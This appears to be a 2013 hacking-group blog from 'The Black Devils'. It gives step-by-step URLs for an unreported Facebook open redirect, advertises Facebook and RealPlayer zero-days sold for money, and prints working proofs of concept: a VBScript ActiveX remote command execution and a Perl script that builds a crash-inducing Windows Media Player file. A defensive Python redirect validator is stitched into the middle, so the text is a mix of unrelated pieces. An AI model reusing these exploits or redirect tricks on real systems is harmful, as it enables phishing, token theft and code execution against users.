Monday, 18 November 2013

Facebook open URL redirection vulnerability


Algerian security researcher "Asesino04" of The Black Devils discovered an open URL redirection vulnerability in Facebook that allowed an attacker to have a facebook.com link redirect to any website without the "Leave Facebook" warning from Facebook.

This kind of vulnerability is used to trick the victim into clicking a trusted link which is designed to lead the victim to a malicious website.

Also, this vulnerability, especially if it is used to make a redirection in a third-party application, can allow an attacker to steal the access token [OAuth bug], which is very critical and dangerous.


The finder of the exploit, who is also a member of the 1337DAY Team, didn't report the bug to Facebook.


The vulnerability exists on the page where anyone can download the iOS or Android SDK.
You go to :
and you copy the link of "download sdk"
# you keep only this 
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=

# then you add to it 
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

# so it becomes like this:

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
then it gets redirected:
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

:)
The bug has full disclosure:
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection
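
How a redirect endpoint can validate its `url` parameter so that a same-site link which is itself a redirector does not pass, as an added example (not code from the original post or from Facebook). The host `www.example.com`, the endpoint-to-parameter map and the function names are assumptions for illustration.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed for illustration: the site's own host and its redirector endpoints,
# mapped to the query parameter that carries the next hop.
TRUSTED_HOSTS = {"www.example.com"}
REDIRECTORS = {"/campaign/landing.php": "url", "/l.php": "u"}
MAX_DEPTH = 3


def naive_check(target):
    """Weak form: trusts any URL whose host is on the allowlist."""
    return urlsplit(target).hostname in TRUSTED_HOSTS


def is_safe_redirect(target, depth=0):
    """Allow a target only if every hop of the chain stays on a trusted host."""
    if depth > MAX_DEPTH or "\\" in target or any(ord(c) < 0x20 for c in target):
        return False
    try:
        parts = urlsplit(target)
    except ValueError:          # malformed authority, e.g. a broken IPv6 literal
        return False
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative ("//host/...") URL: pin scheme and host.
        if parts.scheme != "https" or parts.hostname not in TRUSTED_HOSTS:
            return False
    elif not target.startswith("/"):
        return False            # only site-rooted relative paths are accepted
    # A trusted host is not enough: if the path is itself a redirector,
    # validate the URL it would forward to (the nested case on this page).
    path = "/" + posixpath.normpath(unquote(parts.path)).lstrip("/")
    param = REDIRECTORS.get(path)
    if param is None:
        return True
    return all(is_safe_redirect(nxt, depth + 1)
               for nxt in parse_qs(parts.query).get(param, []))


# Constructed sample: same shape as the chained link described in the post.
NESTED = "https://www.example.com/l.php?u=http%3A%2F%2Fevil.example%2F"

if __name__ == "__main__":
    for t in (NESTED, "https://www.example.com/docs/sdk", "//evil.example/"):
        print(f"{t!r}: naive={naive_check(t)} hardened={is_safe_redirect(t)}")
```

The redirector map has to mirror how the server actually routes paths (case sensitivity, path info, rewrites); otherwise an alternate spelling of the same endpoint slips past the check.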

A proof of Concept :




Saturday, 24 August 2013

Facebook Send Messages From Anyone 0day

A new exploit allows an attacker to send a PM from any Facebook account without access to the victim's account, and it can also send attachments.
The exploit was published yesterday on 1337day.com:
http://1337day.com/exploit/description/21151
The price of the exploit was $600.
The message can't be detected by Facebook.
The video shows how to exploit it.
 

There is also another video showing how to send an attachment.


Wednesday, 17 July 2013

Windows 7 Remote Desktop denial of service vulnerability

An Algerian pentesting team, "The Black Devils", discovered a bug in Remote Desktop on Windows 7 that allows an attacker to use a "DoS" attack against the victim's PC.
The exploit was published on Inj3ct0rs,
and this is a video explaining the exploitation.

The exploit is written in 2 languages [Perl & Python],
and there is also a module written for Metasploit [Ruby], but it is not published yet.


Thursday, 11 July 2013

Reported a Bug to Facebook

Yesterday, when I was on Facebook, I discovered a bug on Facebook. I reported it and am waiting for a response.

Saturday, 6 July 2013

AK-Fuzzer 1.0 Released

AK-Fuzzer 1.0 was released today, and you can download it from here:
https://github.com/Asesino04/AK-Fuzzer


This fuzzer is a combined local & remote fuzzer, but it's only a simple version and the creator will develop it as soon as he can.

Thursday, 4 July 2013

RealPlayer 16.0.2.232 Multiple Vulnerabilities 0-Day

RealPlayer 16.0.2.232 is suffering from multiple vulnerabilities.
An Algerian security researcher has found multiple vulnerabilities in the latest version of RealPlayer and published them on the black market ($120).
RealPlayer is no longer safe because these vulnerabilities allow an attacker to execute malicious code on the target computer. The vulnerability is also written as an MSF module, so it's easy to exploit using Metasploit.

Monday, 24 June 2013

CompatUI ActiveX Control <= Remote Command Execution

# Exploit Title: CompatUI ActiveX Control   <= Remote Command Execution
# Date: 26/02/2013
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Category : [ remote ]
# Dork : [ n / a ]
# Type : Windows
# Tested on: Internet Explorer 6 + 7 on Win Xp SP2
# Special Thanks to Ness Oum El Bouaghi
 
 
</==========================>
 This was written for educational purposes. Use it at your own risk.
 Author will not be responsible for any damage.
/=============================/>
 
  
 File:   C:\WINDOWS\system32\compatui.dll
 CLSID:  {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
 ProgID: COMPATUILib.ProgView
  
Class Util
GUID: {0355854A-7F23-47E2-B7C3-97EE8DD42CD8}
Number of Interfaces: 1
Default Interface: IUtil
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
 
 
 
 
  
 / =========> Proof Of Concept
 ------------------------------
 <object classid='clsid:0355854A-7F23-47E2-B7C3-97EE8DD42CD8' id='compatUI'></object>
 <script language='vbscript'>
 compatUI.RunApplication 1, "calc.exe", 1
 </script>
  
 / ===========>

Windows Media Player All versions Crash Poc

# Title : Windows Media Player All versions crash Poc
# Date: 2013-01-12
# Author: The Black Devils
# Tested on: Windows XP SP2


  
  
  
AppName: wmplayer.exe    AppVer: 10.0.0.3802     ModName: quartz.dll
ModVer: 6.5.2600.2180    Offset: 000ee650
  
#!/usr/bin/perl
system("title The Black Devils");
system("color 1e");
system("cls");
print "\n\n";               
print "    |=======================================================|\n";
print "    |= [!] Name : Windows Media Player 10.0.0.3802 ||.au   =|\n";
print "    |= [!] Exploit : Memory Corruption                     =|\n";
print "    |= [!] Author  : The Black Devils                      =|\n";
print "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com               =|\n";
print "    |=======================================================|\n";
sleep(2);
print "\n";
# Creating ...
my $PoC =
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00";
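# Open the output file and stop with the OS error if it cannot be created
open(my $fh, ">", "inj3ctor.au") or die "\n [-] OupsS! File is Not Created !! $!\n"; # Evil File au
binmode($fh); # write the bytes unmodified
print $fh $PoC;
close($fh);
print "\n [+] File successfully created!\n";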